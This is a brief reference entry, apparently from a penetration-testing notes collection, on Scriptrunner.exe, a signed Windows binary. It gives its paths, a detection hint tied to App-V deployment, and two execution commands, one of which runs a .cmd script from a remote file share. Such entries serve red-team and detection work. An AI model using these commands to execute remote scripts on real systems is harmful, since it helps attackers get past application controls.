Scriptrunner.exe

~/Privilege Escalation/Windows/Binaries# cat Scriptrunner.exe.md █

Paths:

C:\Windows\System32\scriptrunner.exe
C:\Windows\SysWOW64\scriptrunner.exe

Detection: Scriptrunner.exe should not be in use unless App-v is deployed

Execute

Executes calc.exe

Scriptrunner.exe -appvscript calc.exe

Executes calc.cmde from remote server

ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"